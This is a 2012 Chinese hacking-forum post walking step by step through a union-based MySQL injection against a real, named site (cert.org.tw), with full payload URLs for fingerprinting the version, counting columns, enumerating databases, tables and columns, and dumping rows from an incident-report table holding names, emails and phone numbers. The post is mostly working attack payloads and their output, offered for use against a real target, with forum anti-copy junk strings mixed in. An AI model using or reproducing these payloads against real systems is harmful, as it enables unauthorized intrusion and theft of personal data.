找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1892|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
$ q" p: K/ x; q8 P2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解# N& ]. z. J* w+ G) [& \
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
; ?* m9 t( Y9 ~/ s) p1 Q3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--; R% A& D/ {! x8 `( G* W
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
# ]* X( n* a+ i! @4.判断有没有写权限
. [) W3 Q- C) c" d* u/ Y2 Thttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
) Y7 `8 W* m0 X* Z没办法,手动猜表啦
& _# t# k. z- Y2 H5 V5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
' |7 R6 r; O  w9 g但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
2 Y6 n0 J$ Z9 P( S2 whttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--) ~& s! J0 g4 o5 Y
成功查出所有数据库,国外的黑客就是不一般。数据库如下:" X1 ?% K4 H- ~3 [, W0 y/ Q9 v; h# b7 t
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb' V- [6 C$ w" \2 [( x
6.爆表,爆的是twcert库
- B$ o8 T  z2 H" \: Yhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--+ s$ r! P7 X( \3 B( ?
爆出如下表' @, h2 B. Z, \
downloadfile,irsys,newsdata,secrpt,secrpt_big5
, l  i  A3 y2 m# Q2 M* P7.爆列名,这次爆的是irsys表/ T1 x! S9 b  U% N: e/ N. m- x; U
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--# m: k& T" D% R0 A7 @
爆出如下列
9 k0 @* O$ o5 S6 n% n( W3 `3 k5 yir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status5 |5 g+ n6 `) ]+ f
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
5 i0 P( f3 G) Q# `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
$ Y' t* L( |( H" b0 W9 i. p1 _返回是3,说明每个列里有3个地段% p7 j3 p' e  w& S2 W
9.爆字段内容& G* i7 t. o. R5 S/ {% v: M' t
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--8 M/ q5 V  M; }) l5 h0 ]
爆出name列的第一个字段的内容
  k/ n! o7 m. q' i" whttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
0 F3 n* _% f( r) L- e: V8 l0 x( f爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表